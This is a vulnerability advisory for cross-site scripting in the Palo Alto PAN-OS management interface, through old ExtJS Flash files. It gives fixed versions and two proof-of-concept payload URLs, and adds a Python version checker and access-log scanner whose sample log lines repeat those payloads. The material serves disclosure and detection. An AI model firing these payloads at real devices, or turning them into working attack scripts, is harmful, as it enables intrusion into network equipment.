Palo Alto Firewall Multiple Cross-Site Scripting Vulnerabilities
Vulnerability
The Purplemet Lab team discovered multiple cross-site scripting (XSS) vulnerabilities in the Palo Alto PAN-OS Management Web Interface (CVE-2019-1566). PAN-OS 7.1.21 and earlier, PAN-OS 8.0.14 and earlier, and PAN-OS 8.1.5 and earlier embed an old version of ExtJS that ships the Flash files charts.swf and swfupload.swf, both of which are vulnerable to cross-site scripting.
Solution
Update to PAN-OS 7.1.22 or later, PAN-OS 8.0.15 or later, or PAN-OS 8.1.6 or later.
Proof of concept
The vulnerability can be triggered using the following URLs:
https://ip/js/3rdParty/ext/resources/charts.swf?allowedDomain=\%22})))}catch(e){alert(1337)}//
https://ip/js/3rdParty/ext/examples/image-organizer/SWFUpload/Flash/swfupload.swf?movieName=%22])}catch(e){eval(atob(%27YWxlcnQoJ1hTUycp%27))}//
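The following Python script is an added example and is not code from Purplemet or Palo Alto Networks. It turns the advisory into two defender-side checks: an is_affected() function that applies the version thresholds stated above, and a small access-log scanner that flags requests to the two ExtJS Flash paths from the proof of concept whose allowedDomain or movieName value is not a plain host name or identifier. The Combined Log Format layout, the benign-value character set, the handling of hotfix suffixes and the sample log lines are all assumptions made for this example; the file paths, parameter names and version numbers come from the advisory text.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# First fixed release per PAN-OS train, as given in the advisory text.
FIXED_VERSIONS = {
    (7, 1): (7, 1, 22),
    (8, 0): (8, 0, 15),
    (8, 1): (8, 1, 6),
}

def parse_version(text):
    """'8.1.5' -> (8, 1, 5). Hotfix suffixes such as '-h1' are ignored (assumption)."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError("unrecognised PAN-OS version: %r" % text)
    return tuple(int(x) for x in m.groups())

def is_affected(version_text):
    """True when the version belongs to a train named in the advisory and is
    below that train's first fixed release. A train the advisory does not
    mention is reported as not affected by this check."""
    v = parse_version(version_text)
    fixed = FIXED_VERSIONS.get(v[:2])
    return fixed is not None and v < fixed

# Paths of the two ExtJS Flash files named in the proof of concept.
VULNERABLE_PATHS = {
    "/js/3rdParty/ext/resources/charts.swf",
    "/js/3rdParty/ext/examples/image-organizer/SWFUpload/Flash/swfupload.swf",
}
# Query parameters the proof of concept abuses. A legitimate value is a bare
# host name or identifier (assumption), so anything outside this set is suspect.
WATCHED_PARAMS = {"allowedDomain", "movieName"}
BENIGN_VALUE = re.compile(r"^[A-Za-z0-9._-]*$")

# Combined/common log format: client, ident, user, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def inspect_request(target):
    """Return (path, {param: decoded value}) when the request targets one of the
    Flash files with a non-benign value in a watched parameter, else None."""
    parts = urlsplit(target)
    if parts.path not in VULNERABLE_PATHS:
        return None
    suspicious = {}
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in WATCHED_PARAMS and not BENIGN_VALUE.match(value):
            suspicious[name] = value  # parse_qsl has already percent-decoded it
    return (parts.path, suspicious) if suspicious else None

def scan_log(lines):
    """Return one finding per log line carrying a suspicious Flash-file request."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access-log line in the expected layout
        hit = inspect_request(m.group("target"))
        if hit:
            path, params = hit
            findings.append({"src": m.group("src"), "ts": m.group("ts"),
                             "path": path, "params": params,
                             "status": int(m.group("status"))})
    return findings

# Constructed sample log lines (not real traffic): the two proof-of-concept
# URLs from the advisory, one benign chart request and one unrelated request.
SAMPLE_LOG = [
    r'203.0.113.5 - - [10/Mar/2019:12:00:01 +0000] "GET /js/3rdParty/ext/resources/charts.swf?allowedDomain=\%22})))}catch(e){alert(1337)}// HTTP/1.1" 200 4212',
    r'198.51.100.7 - admin [10/Mar/2019:12:00:09 +0000] "GET /js/3rdParty/ext/resources/charts.swf?allowedDomain=fw.example.com HTTP/1.1" 200 4212',
    r'203.0.113.5 - - [10/Mar/2019:12:00:15 +0000] "GET /js/3rdParty/ext/examples/image-organizer/SWFUpload/Flash/swfupload.swf?movieName=%22])}catch(e){eval(atob(%27YWxlcnQoJ1hTUycp%27))}// HTTP/1.1" 200 9801',
    r'198.51.100.7 - admin [10/Mar/2019:12:01:00 +0000] "GET /php/login.php HTTP/1.1" 200 1523',
]

if __name__ == "__main__":
    for ver in ("8.1.5", "8.1.6", "7.1.21"):
        print(ver, "affected" if is_affected(ver) else "fixed")
    for f in scan_log(SAMPLE_LOG):
        print(f["src"], f["ts"], f["path"], f["params"])
```

Because the check is on the decoded parameter value rather than on a fixed payload string, it also catches variations of the same injection that percent-encode different characters; the trade-off is that any deployment that legitimately passes a non-host-name value in allowedDomain or movieName would need the benign pattern widened. On the two sample proof-of-concept lines the scanner reports both requests and stays quiet on the benign chart request and the unrelated login request.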
Reference
See Palo Alto Security Advisory PAN-SA-2019-0002.
Purplemet technology detection
Purplemet detects Palo Alto and embedded ExtJS.